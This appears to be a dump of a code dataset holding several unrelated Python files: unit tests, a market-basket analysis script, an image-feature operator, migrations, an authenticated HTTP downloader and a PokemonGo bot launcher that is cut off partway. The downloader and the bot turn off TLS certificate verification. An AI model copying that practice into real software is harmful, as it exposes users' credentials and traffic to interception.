id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
import os
import pytest
from scripttease.library.commands import Command, ItemizedCommand
from scripttease.parsers.utils import *
def test_filter_commands():
    """filter_commands() narrows a command list by environment and/or tag."""
    commands = [
        Command("apt-get install apache2 -y", environments=["base"], tags=["web"]),
        Command("apt-get install apache-top -y", environments=["live"], tags=["web"]),
        Command("pip install django-debug-toolbar", environments=["development"], tags=["django"]),
        Command("pip install django", environments=["base"], tags=["django"]),
    ]
    # (filter kwargs, expected number of surviving commands)
    cases = [
        (dict(environments=["base", "live"]), 3),
        (dict(tags=["django"]), 2),
        (dict(environments=["base", "development"]), 3),
        (dict(environments=["base"], tags=["web"]), 1),
    ]
    for kwargs, expected_count in cases:
        assert len(filter_commands(commands, **kwargs)) == expected_count
def test_load_commands():
    """load_commands() returns None for bad input and a filtered list otherwise."""
    # Unsupported extension, missing file, and unparsable file all yield None.
    for bad_path in ("nonexistent.xml", "nonexistent.ini", "tests/examples/bad_examples.ini"):
        assert load_commands(bad_path) is None

    filtered = load_commands(
        "tests/examples/python_examples.ini",
        filters={'tags': ["python-support"]}
    )
    assert len(filtered) == 2
def test_load_variables():
    """load_variables() is empty for bad files and honors environment filters."""
    examples = os.path.join("tests", "examples")
    assert len(load_variables("nonexistent.ini")) == 0
    # A non-INI file parses to nothing.
    assert len(load_variables(os.path.join(examples, "templates", "simple.txt"))) == 0
    # All variables, then only those scoped to the "testing" environment.
    assert len(load_variables(os.path.join(examples, "variables.ini"))) == 5
    assert len(load_variables(os.path.join(examples, "variables.ini"), environment="testing")) == 4
class TestContext(object):
    """Exercise the Context variable container."""

    def test_add(self):
        context = Context()
        context.add("testing", True)
        assert len(context.variables) == 1
        context.add("also_testing", False)
        assert len(context.variables) == 2
        # add() returns the created Variable instance.
        assert isinstance(context.add("still_testing", True), Variable)
        # Re-adding an existing name is an error.
        with pytest.raises(RuntimeError):
            context.add("testing", True)

    def test_get(self):
        context = Context(testing=True)
        assert context.get("testing") is True
        assert context.get("nonexistent") is None
        assert context.get("nonexistent", default=True) is True

    def test_getattr(self):
        context = Context(testing=True)
        assert context.testing is True
        # Unknown names resolve to None rather than raising.
        assert context.nonexistent is None

    def test_has(self):
        context = Context(testing=True)
        assert context.has("testing") is True
        assert context.has("nonexistent") is False

    def test_init(self):
        assert len(Context(testing=True, also_testing=123).variables) == 2

    def test_join(self):
        context = Context(testing=True)
        extras = [
            Variable("testing", True),
            Variable("also_testing", True),
        ]
        # Joining de-duplicates on name, so only one new variable is added.
        context.join(extras)
        assert len(context.variables) == 2

    def test_mapping(self):
        context = Context(testing=True, also_testing=False, still_testing=True)
        assert type(context.mapping()) is dict
        assert len(context.mapping()) == 3

    def test_merge(self):
        first = Context(testing=True, also_testing=False)
        first.merge(Context(still_testing=True))
        assert len(first.variables) == 3

    def test_repr(self):
        context = Context(testing=True, also_testing=False, still_testing=True)
        assert repr(context) == "<Context (3)>"
class TestVariable(object):
    """Exercise the Variable value object."""

    def test_eq(self):
        # Variables compare equal to their underlying value.
        assert Variable("testing", True) == True

    def test_getattr(self):
        variable = Variable("testing", True, one="a", two="b")
        assert variable.one == "a"
        assert variable.two == "b"
        # Unknown attributes resolve to None rather than raising.
        assert variable.three is None

    def test_repr(self):
        assert repr(Variable("testing", True)) == "<Variable testing>"
| StarcoderdataPython |
# Copyright (C) 2021 by Ivan.
# This file is part of Snowflake package.
# Snowflake is released under the MIT License (see LICENSE).
from datetime import tzinfo, timedelta
import pytest
from snowflake import Snowflake
from snowflake.snowflake import MAX_TS, MAX_SEQ, MAX_INSTANCE
def test_parse():
    """Snowflake.parse() must decompose a known ID into all of its fields."""

    class FixedOffset(tzinfo):
        """A +05:31 zone used to check datetime_tz() conversion."""
        _offset = timedelta(seconds=19860)
        _dst = timedelta(0)

        def utcoffset(self, dt):
            return self._offset

        def dst(self, dt):
            return self._dst

    parsed = Snowflake.parse(856165981072306191, 1288834974657)
    assert parsed.timestamp == 204125876682
    assert parsed.instance == 363
    assert parsed.epoch == 1288834974657
    assert parsed.seq == 15
    assert parsed.seconds == 1492960851.339
    assert parsed.milliseconds == 1492960851339
    assert str(parsed.datetime) == "2017-04-23 15:20:51.339000"
    assert str(parsed.datetime_tz(FixedOffset())) == "2017-04-23 20:51:51.339000+05:31"
    assert str(parsed.timedelta) == "14917 days, 1:42:54.657000"
    assert parsed.value == 856165981072306191
def test_min():
    """The all-zero snowflake encodes to the integer 0."""
    zero = Snowflake(0, 0)
    assert zero.value == 0
def test_max():
    """Saturating every field yields the largest signed 64-bit integer."""
    maxed = Snowflake(MAX_TS, MAX_INSTANCE, seq=MAX_SEQ)
    assert maxed.value == 2 ** 63 - 1
def test_timestamp_overflow():
    """Timestamps outside [0, MAX_TS] are rejected."""
    # The boundary values themselves are accepted.
    Snowflake(0, 0)
    Snowflake(MAX_TS, 0)
    message = "timestamp must be greater than 0 and less than 2199023255551!"
    with pytest.raises(ValueError, match=message):
        Snowflake(MAX_TS + 1, 0)
    with pytest.raises(ValueError, match=message):
        Snowflake(-1, 0)
def test_instance_overflow():
    """Instance IDs outside [0, MAX_INSTANCE] are rejected."""
    Snowflake(0, 0)
    Snowflake(0, MAX_INSTANCE)
    message = "instance must be greater than 0 and less than 1023!"
    with pytest.raises(ValueError, match=message):
        Snowflake(0, -1)
    with pytest.raises(ValueError, match=message):
        Snowflake(0, MAX_INSTANCE + 1)
def test_epoch_overflow():
    """Negative epochs are rejected; zero is allowed."""
    Snowflake(0, 0, epoch=0)
    with pytest.raises(ValueError, match="epoch must be greater than 0!"):
        Snowflake(0, 0, epoch=-1)
def test_seq_overflow():
    """Sequence numbers outside [0, MAX_SEQ] are rejected."""
    Snowflake(0, 0, seq=0)
    Snowflake(0, 0, seq=MAX_SEQ)
    message = "seq must be greater than 0 and less than 4095!"
    with pytest.raises(ValueError, match=message):
        Snowflake(0, 0, seq=-1)
    with pytest.raises(ValueError, match=message):
        Snowflake(0, 0, seq=MAX_SEQ + 1)
| StarcoderdataPython |
##############################################################################
#
# <NAME>
# <EMAIL>
# References:
# SuperDataScience,
# Official Documentation
# Meta Information:
# __version__ = '1.1.1'
# __author__ = '<NAME>'
# __author_email__ = '<EMAIL>'
#
##############################################################################
# Apriori
# Importing the libraries
# Importing the libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd

# Data Preprocessing: the CSV has no header row, one transaction per line.
dataset = pd.read_csv('Market_Basket_Optimisation.csv', header = None)
transactions = []
# Create an array of transactions: every row has up to 20 item columns;
# missing cells become the string 'nan' (str() of NaN) -- apyori simply
# treats that as one more (irrelevant) item.
for i in range(0, 7501):
    transactions.append([str(dataset.values[i,j]) for j in range(0, 20)])

# Training Apriori on the dataset
from apyori import apriori
rules = apriori(transactions, min_support = 0.003, min_confidence = 0.2, min_lift = 3, min_length = 2)

# Visualising the results: materialise the rule generator into a list.
# (BUG FIX: the original line carried fused dataset-extraction residue
# "| StarcoderdataPython |" that made it a syntax error.)
results = list(rules)
3465376 | <filename>glrlm/operator.py
# -*- coding: utf-8 -*-
"""
Created on Fri Feb 04 12:56:00 2022
@author: eiproject
"""
from .model import DegreeGLRLM, FeatureGLRLM
class Operator:
    """
    GLRLM Operator computing the five classic run-length features
    (SRE, LRE, GLU, RLU, RPC) from a DegreeGLRLM's matrices.
    """

    def __init__(self):
        self.title = "GLRLM Operator"
        # DegreeGLRLM instance supplied via create_feature(); its .Degrees
        # attribute is an iterable of 2-D numpy run-length matrices.
        self.__degree_obj = None

    def __feature_sum(self, column_term):
        """
        Shared skeleton for all five features (the original duplicated this
        loop in every method and shadowed its own loop variable with
        ``for input_matrix in input_matrix``).

        For each degree matrix: compute the column totals Rj (number of
        runs of length j), feed them to ``column_term(rj, j, s, size)``
        where ``s`` is the sum of all matrix entries and ``size`` the cell
        count, sum the per-column contributions, round to 3 decimals, then
        return the rounded sum over all degree matrices.
        """
        per_matrix = []
        for matrix in self.__degree_obj.Degrees:
            height, width = matrix.shape
            column_totals = [
                sum(matrix[y][x] for y in range(height)) for x in range(width)
            ]
            s = sum(column_totals)
            value = sum(
                column_term(rj, x + 1, s, height * width)
                for x, rj in enumerate(column_totals)
            )
            per_matrix.append(round(value, 3))
        return round(sum(per_matrix), 3)

    def __SRE(self):
        # Short Run Emphasis: sum_j (Rj / S) / j^2
        return self.__feature_sum(lambda rj, j, s, size: (rj / s) / (j ** 2))

    def __LRE(self):
        # Long Run Emphasis: sum_j (Rj * j^2) / S
        return self.__feature_sum(lambda rj, j, s, size: (rj * ((j) ** 2)) / s)

    def __GLU(self):
        # NOTE(review): the original implementation ignores Rj here and sums
        # j^2 / S per run length (its Rj accumulator was dead code); this is
        # preserved as-is for output compatibility, although a textbook
        # Gray Level Uniformity would use gray-level totals -- TODO confirm.
        return self.__feature_sum(lambda rj, j, s, size: ((j) ** 2) / s)

    def __RLU(self):
        # Run Length Uniformity: sum_j Rj^2 / S
        return self.__feature_sum(lambda rj, j, s, size: (rj ** 2) / s)

    def __RPC(self):
        # Run Percentage: sum_j Rj / (rows * cols)
        return self.__feature_sum(lambda rj, j, s, size: rj / size)

    def create_feature(self, degree):
        """Compute all five features for *degree* (a DegreeGLRLM) and wrap
        them in a FeatureGLRLM."""
        self.__degree_obj = degree
        return FeatureGLRLM(
            self.__SRE(),
            self.__LRE(),
            self.__GLU(),
            self.__RLU(),
            self.__RPC())
| StarcoderdataPython |
#!/usr/bin/env python
import sys
import subprocess
import urllib2
import base64
import re
import os.path
from bs4 import BeautifulSoup, NavigableString
USERNAME = "YOUR_USERNAME"
PASSWORD = "<PASSWORD>"
def startAndWaitForAria(chdir, url):
if os.path.exists(chdir) is not True:
print "Path {0} does not exist, attempting to create".format(chdir)
try:
os.makedirs(chdir)
except:
print "Failed to make directory, exiting"
return
os.chdir(chdir)
print "Downloading: {0} to {1}".format(url, chdir)
p = subprocess.Popen(['/usr/bin/aria2c', '-s16', '-x16', '-k1M', '--check-certificate=false', '--http-user={0}'.format(USERNAME), '--http-passwd={0}'.format(PASSWORD), url])
p.wait()
def findFilesWithPattern(cwd, baseurl, pattern):
    """Scan an Apache-style HTTP directory listing and collect download pairs.

    Returns a list of [local_directory, file_url] pairs. *pattern* is a
    compiled regex or None; when given, only matching file names in the
    current directory are collected and no recursion into subdirectories
    happens (see the author's note below).
    """
    downloadList = []
    data = downloadAuthFile(baseurl)
    if data is None:
        return downloadList
    data = data.read()
    soup = BeautifulSoup(data)
    table = soup.select('table')
    if len(table):
        for tr in table[0].find_all('tr'):
            # Expect at least 4 cells per row (see column note below).
            if len(tr.contents) < 4:
                print "Incompatible HTTP list type"
                continue
            # Name Last Modified Size Type
            dlname = tr.contents[0]
            dltype = tr.contents[3]
            if dlname is None or dltype is None:
                print "Parse error #1"
                continue
            # Header rows hold bare text instead of an anchor tag; skip them.
            if type(dlname.next_element) is NavigableString:
                continue
            dlurl = dlname.next_element
            if dlurl is None:
                print "Parse error #2"
                continue
            # I added pattern check because if we're pattern matching we probably only want things from one directory
            # Recursion here could end up causing weird problems, especially if we're using it to download files from a root folder for example
            # It would traverse all the directories and end up downloading every file on the entire box that matched. Not good.
            # I will probably add a -r switch or something for this specific purpose
            if dltype.text.startswith('Directory') and dlurl['href'].startswith('.') is not True and pattern is None:
                newcwd = cwd + urllib2.unquote(dlurl['href'])
                print "Directory: " + newcwd
                downloadList = downloadList + findFilesWithPattern(newcwd, "{0}{1}".format(baseurl, dlurl['href']), pattern)
            else:
                filename = dlurl.contents[0]
                href = dlurl['href']
                if pattern is not None:
                    if pattern.findall(filename):
                        p = [cwd, "{0}{1}".format(baseurl, href)]
                        downloadList.append(p)
                else:
                    # Skip "." / ".." style self references.
                    if href.startswith('.') is not True:
                        p = [cwd, "{0}{1}".format(baseurl, href)]
                        downloadList.append(p)
    return downloadList
def getBasicAuthString():
    # Build the base64 "user:pass" token for an HTTP Basic Authorization
    # header (base64.encodestring appends newlines, hence the replace).
    return base64.encodestring('%s:%s' % (USERNAME, PASSWORD)).replace('\n', '')
def downloadFileList(downloads):
if len(downloads) > 0:
for f in downloads:
startAndWaitForAria(f[0], f[1])
else:
print "No files found in directory!"
def singleFileDownload(url):
    # A trailing slash means a directory listing: enumerate and fetch every
    # file found there; otherwise download the single file directly.
    if url.endswith('/'):
        downloadFileList(findFilesWithPattern(os.getcwd() + '/', url, None))
    else:
        startAndWaitForAria(os.getcwd() + '/', url)
def multiRegexDownload(url, reg):
    # Download every file in the directory listing at *url* whose name
    # matches the regex string *reg*. Only directory URLs make sense here.
    if url.endswith('/') is not True:
        print "This mode only supports directories!"
    else:
        downloadFileList(findFilesWithPattern(os.getcwd() + '/', url, re.compile(reg)))
def downloadAuthFile(url):
    # Open *url* with HTTP Basic auth; returns the response object, or None
    # on any failure (errors are printed, never raised to the caller).
    request = urllib2.Request(url)
    request.add_header("Authorization", "Basic %s" % getBasicAuthString())
    try:
        return urllib2.urlopen(request)
    except urllib2.URLError, e:
        # NOTE(review): URLError exposes .reason, not errno/strerror; this
        # format may itself raise AttributeError in practice -- verify.
        print "URL Error ({0}): {1}".format(e.errno, e.strerror)
    except urllib2.HTTPError, e:
        # NOTE(review): HTTPError subclasses URLError, so this branch looks
        # unreachable after the handler above -- confirm intended order.
        print "HTTP Error ({0}): {1}".format(e.errno, e.strerror)
    except:
        print "Unknown Exception: ", sys.exc_info()[0]
    return None
if len(sys.argv) == 2:
singleFileDownload(sys.argv[1])
elif len(sys.argv) == 3:
multiRegexDownload(sys.argv[1], sys.argv[2])
else:
print "Parameter mismatch: Please enter URL to either a file, or a directory with an optional regex pattern" | StarcoderdataPython |
# For each of T test cases (first stdin line), print
# "#<case> <sum of the odd numbers on the case's line>".
# (BUG FIX: the first and last lines carried fused dataset-extraction
# residue -- an id prefix and "| StarcoderdataPython |" -- making this a
# syntax error.)
for i in range(int(input())):
    answer = sum(filter(lambda x: x % 2, map(int, input().split())))
    print("#{} {}".format(i + 1, answer))
5175365 | <reponame>ivan-c/truenth-portal<filename>portal/migrations/versions/72dcf1946d3f_.py<gh_stars>1-10
from alembic import op
import sqlalchemy as sa
"""empty message
Revision ID: <KEY>
Revises: ('<KEY>', '<PASSWORD>')
Create Date: 2017-12-12 12:43:16.976320
"""
# revision identifiers, used by Alembic.
revision = '<KEY>'
down_revision = ('<KEY>', '<PASSWORD>')
def upgrade():
    # No-op: this revision exists only to merge two migration heads
    # (down_revision is a tuple), so there is no schema change to apply.
    pass
def downgrade():
    # Merge revisions have nothing to revert.
    pass
| StarcoderdataPython |
8046724 | # Generated by Django 2.0 on 2019-02-07 16:19
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Adds an optional FK from WorkCycleGroup to Project (DO_NOTHING on
    # delete), reachable from Project via the "project_groups" reverse name.
    dependencies = [
        ('base', '0052_fill_new_item_order'),
    ]
    operations = [
        migrations.AddField(
            model_name='workcyclegroup',
            name='project',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='project_groups', to='base.Project'),
        ),
    ]
| StarcoderdataPython |
332214 | <reponame>tdiprima/code
from Numeric import *
def peaks(data, step):
    """Return an array of (max, min) pairs, one per window of *step* samples."""
    usable = len(data) - len(data) % step  # drop the incomplete tail window
    # One strided slice per offset within a window; elementwise-reducing the
    # slices yields the per-window extremes.
    strided = [data[offset:usable:step] for offset in range(step)]
    extremes = [reduce(op, strided) for op in (maximum, minimum)]
    return transpose(array(extremes))
"""example of use:
>>> x = sin(arrayrange(0, 3.14, 1e-5))
>>> len(x)
314000
>>> peaks(x,10000)
array([[ 0.09982347, 0. ],
[ 0.19865953, 0.09983342],
...
[ 0.23924933, 0.14112991],
[ 0.14112001, 0.04159065]])
"""
| StarcoderdataPython |
9702638 | <reponame>VLAM3D/vulkanmitts<gh_stars>1-10
import unittest
import pyglslang
from glsl_to_spv import *
class TestInit(unittest.TestCase):
    """Process lifecycle and version/tool-id queries of pyglslang."""

    def test_init_glslang(self):
        # Init/finalize must round-trip without raising.
        pyglslang.InitializeProcess()
        pyglslang.FinalizeProcess()

    def test_program(self):
        pyglslang.InitializeProcess()
        self.assertIsNotNone(pyglslang.TProgram())
        pyglslang.FinalizeProcess()

    def _check_version(self, version_string):
        # Shared check: a version string must exist and be non-empty.
        self.assertIsNotNone(version_string)
        self.assertTrue(len(version_string) > 0)

    def test_glsl_version_string(self):
        self._check_version(pyglslang.GetGlslVersionString())

    def test_essl_version_string(self):
        self._check_version(pyglslang.GetEsslVersionString())

    def test_khronos_tool_id(self):
        tool_id = pyglslang.GetKhronosToolId()
        self.assertIsNotNone(tool_id)
        self.assertTrue(tool_id > 0)
class TestShadersCtor(unittest.TestCase):
    """A TShader must be constructible for every pipeline stage."""

    def setUp(self):
        pyglslang.InitializeProcess()

    def _assert_stage_builds(self, stage):
        # Shared check used by every per-stage test below.
        self.assertIsNotNone(pyglslang.TShader(stage))

    def test_vertex_shader(self):
        self._assert_stage_builds(pyglslang.EShLangVertex)

    def test_tess_ctrl_shader(self):
        self._assert_stage_builds(pyglslang.EShLangTessControl)

    def test_tess_eval_shader(self):
        self._assert_stage_builds(pyglslang.EShLangTessEvaluation)

    def test_geo_shader(self):
        self._assert_stage_builds(pyglslang.EShLangGeometry)

    def test_frag_shader(self):
        self._assert_stage_builds(pyglslang.EShLangFragment)

    def test_compute_shader(self):
        self._assert_stage_builds(pyglslang.EShLangCompute)

    def tearDown(self):
        pyglslang.FinalizeProcess()
class TestGLSLToSPV(unittest.TestCase):
    """Compile the example GLSL sources to SPIR-V without raising."""

    def setUp(self):
        # Load the example shader sources shipped next to the test suite.
        with open('vertex_shader.glsl','r') as vs_in:
            self.vs_txt = vs_in.read()
        with open('fragment_shader.glsl','r') as fs_in:
            self.fs_txt = fs_in.read()

    def test_vertex_shader_to_spv(self):
        glsl_to_spv(pyglslang.EShLangVertex, self.vs_txt)

    def test_fragment_shader_to_spv(self):
        # BUG FIX: this method was also named test_vertex_shader_to_spv,
        # shadowing the vertex test so it was never collected or run.
        glsl_to_spv(pyglslang.EShLangFragment, self.fs_txt)
class TestDisassembler(unittest.TestCase):
    """Disassemble compiled SPIR-V to text (to stdout and to a file)."""

    def setUp(self):
        # Load the example shader sources shipped next to the test suite.
        with open('vertex_shader.glsl','r') as handle:
            self.vs_txt = handle.read()
        with open('fragment_shader.glsl','r') as handle:
            self.fs_txt = handle.read()

    def test_disassembler_stdout(self):
        compiled = glsl_to_spv(pyglslang.EShLangVertex, self.vs_txt)
        pyglslang.disassemble_stdout(compiled)

    def test_disassembler(self):
        compiled = glsl_to_spv(pyglslang.EShLangVertex, self.vs_txt)
        pyglslang.disassemble(compiled, 'test_disassemble.txt')
# (BUG FIX: the unittest.main() line carried fused dataset-extraction
# residue "| StarcoderdataPython |" that made it a syntax error.)
if __name__ == '__main__':
    # set defaultTest to invoke a specific test case
    unittest.main()
3351406 | <gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
pgoapi - Pokemon Go API
Copyright (c) 2016 tjado <https://github.com/tejado>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
OR OTHER DEALINGS IN THE SOFTWARE.
Author: tjado <https://github.com/tejado>
"""
import argparse
import codecs
import json
import logging
import os
import ssl
import sys
import time
from datetime import timedelta
from getpass import getpass
from pgoapi.exceptions import NotLoggedInException
from pokemongo_bot import PokemonGoBot, TreeConfigBuilder
from pokemongo_bot import logger
if sys.version_info >= (2, 7, 9):
ssl._create_default_https_context = ssl._create_unverified_context
def main():
    """Top-level entry point: configure, then run the bot until interrupted.

    Reconnects (after a configurable cool-down) when the API session drops,
    and prints a session summary on Ctrl-C or any unexpected error.
    """
    logger.log('PokemonGO Bot v1.0', 'green')
    # Force UTF-8-capable std streams (Python 2: stdout/stderr are byte streams).
    sys.stdout = codecs.getwriter('utf8')(sys.stdout)
    sys.stderr = codecs.getwriter('utf8')(sys.stderr)
    config = init_config()
    if not config:
        return
    logger.log('Configuration initialized', 'yellow')
    finished = False
    while not finished:
        try:
            # Build a fresh bot (and task tree) each connection attempt.
            bot = PokemonGoBot(config)
            bot.start()
            tree = TreeConfigBuilder(bot, config.raw_tasks).build()
            bot.workers = tree
            bot.metrics.capture_stats()
            logger.log('Starting PokemonGo Bot....', 'green')
            while True:
                bot.tick()
        except KeyboardInterrupt:
            logger.log('Exiting PokemonGo Bot', 'red')
            finished = True
            report_summary(bot)
        except NotLoggedInException:
            # Session expired: wait, then loop around and rebuild the bot.
            logger.log('[x] Error while connecting to the server, please wait %s minutes' % config.reconnecting_timeout, 'red')
            time.sleep(config.reconnecting_timeout * 60)
        except:
            # always report session summary and then raise exception
            report_summary(bot)
            raise
def report_summary(bot):
    """Print an end-of-session metrics summary (runtime, XP, catches, ...)."""
    if bot.metrics.start_time is None:
        return # Bot didn't actually start, no metrics to show.

    metrics = bot.metrics
    # Pull the latest server-side stats before reporting.
    metrics.capture_stats()
    logger.log('')
    logger.log('Ran for {}'.format(metrics.runtime()), 'cyan')
    logger.log('Total XP Earned: {} Average: {:.2f}/h'.format(metrics.xp_earned(), metrics.xp_per_hour()), 'cyan')
    logger.log('Travelled {:.2f}km'.format(metrics.distance_travelled()), 'cyan')
    logger.log('Visited {} stops'.format(metrics.visits['latest'] - metrics.visits['start']), 'cyan')
    logger.log('Encountered {} pokemon, {} caught, {} released, {} evolved, {} never seen before'
               .format(metrics.num_encounters(), metrics.num_captures(), metrics.releases,
                       metrics.num_evolutions(), metrics.num_new_mons()), 'cyan')
    logger.log('Threw {} pokeball{}'.format(metrics.num_throws(), '' if metrics.num_throws() == 1 else 's'),
               'cyan')
    logger.log('Earned {} Stardust'.format(metrics.earned_dust()), 'cyan')
    logger.log('')
    # These two are only known once at least one pokemon was caught.
    if metrics.highest_cp is not None:
        logger.log('Highest CP Pokemon: {}'.format(metrics.highest_cp['desc']), 'cyan')
    if metrics.most_perfect is not None:
        logger.log('Most Perfect Pokemon: {}'.format(metrics.most_perfect['desc']), 'cyan')
def init_config():
    """Build the bot configuration from CLI arguments and a JSON config file.

    CLI flags always win; otherwise values fall back to the JSON file
    (configs/config.json or the file given via -cf/--config), then to the
    coded defaults. Returns an argparse.Namespace, or None on any
    validation error.
    """
    parser = argparse.ArgumentParser()
    config_file = "configs/config.json"
    web_dir = "web"

    # If config file exists, load variables from json
    load = {}

    # Select a config file code
    parser.add_argument("-cf", "--config", help="Config File to use")
    config_arg = parser.parse_known_args() and parser.parse_known_args()[0].config or None
    if config_arg and os.path.isfile(config_arg):
        with open(config_arg) as data:
            load.update(json.load(data))
    elif os.path.isfile(config_file):
        logger.log('No config argument specified, checking for /configs/config.json', 'yellow')
        with open(config_file) as data:
            load.update(json.load(data))
    else:
        logger.log('Error: No /configs/config.json or specified config', 'red')

    # Read passed in Arguments
    required = lambda x: x not in load
    add_config(
        parser,
        load,
        short_flag="-a",
        long_flag="--auth_service",
        help="Auth Service ('ptc' or 'google')",
        required=required("auth_service"),
        default=None
    )
    add_config(
        parser,
        load,
        short_flag="-u",
        long_flag="--username",
        help="Username",
        default=None
    )
    add_config(
        parser,
        load,
        short_flag="-ws",
        long_flag="--websocket_server",
        help="Start websocket server (format 'host:port')",
        default=False
    )
    add_config(
        parser,
        load,
        short_flag="-p",
        long_flag="--password",
        help="Password",
        default=None
    )
    add_config(
        parser,
        load,
        short_flag="-l",
        long_flag="--location",
        help="Location",
        type=parse_unicode_str,
        default=''
    )
    add_config(
        parser,
        load,
        short_flag="-lc",
        long_flag="--location_cache",
        help="Bot will start at last known location",
        type=bool,
        default=False
    )
    add_config(
        parser,
        load,
        long_flag="--forts.spin",
        help="Enable Spinning Pokestops",
        type=bool,
        default=True,
    )
    add_config(
        parser,
        load,
        short_flag="-w",
        long_flag="--walk",
        help=
        "Walk instead of teleport with given speed (meters per second, e.g. 2.5)",
        type=float,
        default=2.5
    )
    add_config(
        parser,
        load,
        short_flag="-k",
        long_flag="--gmapkey",
        help="Set Google Maps API KEY",
        type=str,
        default=None
    )
    add_config(
        parser,
        load,
        short_flag="-ms",
        long_flag="--max_steps",
        help=
        "Set the steps around your initial location(DEFAULT 5 mean 25 cells around your location)",
        type=int,
        default=50
    )
    add_config(
        parser,
        load,
        short_flag="-n",
        long_flag="--navigator.type",
        help="Set the navigator to be used(DEFAULT spiral)",
        type=str,
        default='spiral'
    )
    add_config(
        parser,
        load,
        short_flag="-pm",
        long_flag="--navigator.path_mode",
        help="Set the mode for the path navigator (DEFAULT loop)",
        type=str,
        default="loop"
    )
    add_config(
        parser,
        load,
        short_flag="-pf",
        long_flag="--navigator.path_file",
        help="Set the file containing the path for the path navigator (GPX or JSON).",
        type=str,
        default=None
    )
    add_config(
        parser,
        load,
        short_flag="-d",
        long_flag="--debug",
        help="Debug Mode",
        type=bool,
        default=False
    )
    add_config(
        parser,
        load,
        short_flag="-t",
        long_flag="--test",
        help="Only parse the specified location",
        type=bool,
        default=False
    )
    add_config(
        parser,
        load,
        short_flag="-du",
        long_flag="--distance_unit",
        help="Set the unit to display distance in (e.g, km for kilometers, mi for miles, ft for feet)",
        type=str,
        default='km'
    )
    add_config(
        parser,
        load,
        short_flag="-ev",
        long_flag="--evolve_all",
        help="(Batch mode) Pass \"all\" or a list of pokemon to evolve (e.g., \"Pidgey,Weedle,Caterpie\"). Bot will start by attempting to evolve all pokemon. Great after popping a lucky egg!",
        type=str,
        default=[]
    )
    add_config(
        parser,
        load,
        short_flag="-ecm",
        long_flag="--evolve_cp_min",
        help="Minimum CP for evolve all. Bot will attempt to first evolve highest IV pokemon with CP larger than this.",
        type=int,
        default=300
    )
    add_config(
        parser,
        load,
        short_flag="-ec",
        long_flag="--evolve_captured",
        help="(Ad-hoc mode) Pass \"all\" or a list of pokemon to evolve (e.g., \"Pidgey,Weedle,Caterpie\"). Bot will attempt to evolve all the pokemon captured!",
        type=str,
        default=[]
    )
    add_config(
        parser,
        load,
        short_flag="-le",
        long_flag="--use_lucky_egg",
        help="Uses lucky egg when using evolve_all",
        type=bool,
        default=False
    )
    add_config(
        parser,
        load,
        short_flag="-rt",
        long_flag="--reconnecting_timeout",
        help="Timeout between reconnecting if error occured (in minutes, e.g. 15)",
        type=float,
        default=15.0
    )
    add_config(
        parser,
        load,
        short_flag="-hr",
        long_flag="--health_record",
        help="Send anonymous bot event to GA for bot health record. Set \"health_record\":false if you need disable it.",
        type=bool,
        default=True
    )
    add_config(
        parser,
        load,
        short_flag="-ac",
        long_flag="--forts.avoid_circles",
        help="Avoids circles (pokestops) of the max size set in max_circle_size flag",
        type=bool,
        default=False,
    )
    add_config(
        parser,
        load,
        short_flag="-mcs",
        long_flag="--forts.max_circle_size",
        help="If avoid_circles flag is set, this flag specifies the maximum size of circles (pokestops) avoided",
        type=int,
        default=10,
    )
    add_config(
        parser,
        load,
        long_flag="--catch_randomize_reticle_factor",
        help="Randomize factor for pokeball throwing accuracy (DEFAULT 1.0 means no randomize: always 'Excellent' throw. 0.0 randomizes between normal and 'Excellent' throw)",
        type=float,
        default=1.0
    )
    add_config(
        parser,
        load,
        long_flag="--catch_randomize_spin_factor",
        help="Randomize factor for pokeball curve throwing (DEFAULT 1.0 means no randomize: always perfect 'Super Spin' curve ball. 0.0 randomizes between normal and 'Super Spin' curve ball)",
        type=float,
        default=1.0
    )

    # Start to parse other attrs
    config = parser.parse_args()
    if not config.username and 'username' not in load:
        config.username = raw_input("Username: ")
    if not config.password and 'password' not in load:
        # BUG FIX: this line was corrupted to "<PASSWORD>pass(...)" (invalid
        # syntax); restored to the getpass() call imported at file top.
        config.password = getpass("Password: ")

    config.catch = load.get('catch', {})
    config.release = load.get('release', {})
    config.item_filter = load.get('item_filter', {})
    config.action_wait_max = load.get('action_wait_max', 4)
    config.action_wait_min = load.get('action_wait_min', 1)
    config.raw_tasks = load.get('tasks', [])
    config.vips = load.get('vips',{})

    if len(config.raw_tasks) == 0:
        logging.error("No tasks are configured. Did you mean to configure some behaviors? Read https://github.com/PokemonGoF/PokemonGo-Bot/wiki/Configuration-files#configuring-tasks for more information")
        return None

    if config.auth_service not in ['ptc', 'google']:
        logging.error("Invalid Auth service specified! ('ptc' or 'google')")
        return None

    def task_configuration_error(flag_name):
        parser.error("""
        \"{}\" was removed from the configuration options.
        You can now change the behavior of the bot by modifying the \"tasks\" key.
        Read https://github.com/PokemonGoF/PokemonGo-Bot/wiki/Configuration-files#configuring-tasks for more information.
        """.format(flag_name))

    # Reject configuration keys that were superseded by the "tasks" list.
    old_flags = ['mode', 'catch_pokemon', 'spin_forts', 'forts_spin', 'hatch_eggs', 'release_pokemon', 'softban_fix',
                 'longer_eggs_first']
    for flag in old_flags:
        if flag in load:
            task_configuration_error(flag)
            return None

    nested_old_flags = [('forts', 'spin'), ('forts', 'move_to_spin')]
    for outer, inner in nested_old_flags:
